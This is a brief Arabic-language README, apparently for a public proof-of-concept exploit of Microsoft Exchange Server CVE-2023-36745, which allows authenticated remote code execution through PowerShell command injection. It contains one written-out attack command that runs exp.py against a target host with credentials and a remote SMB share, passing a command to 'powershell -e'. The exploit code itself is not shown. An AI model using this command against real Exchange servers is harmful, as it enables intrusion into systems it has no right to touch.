
إثبات المفهوم لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بعد في Microsoft Exchange Server CVE-2023-36745، مما يتيح تنفيذ التعليمات البرمجية عن بعد عبر حقن أوامر PowerShell المعتمد.
Microsoft Exchange Server CVE-2023-36745 RCE PoC.
مثال:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
سيتم تمرير الأمر إلى powershell -e.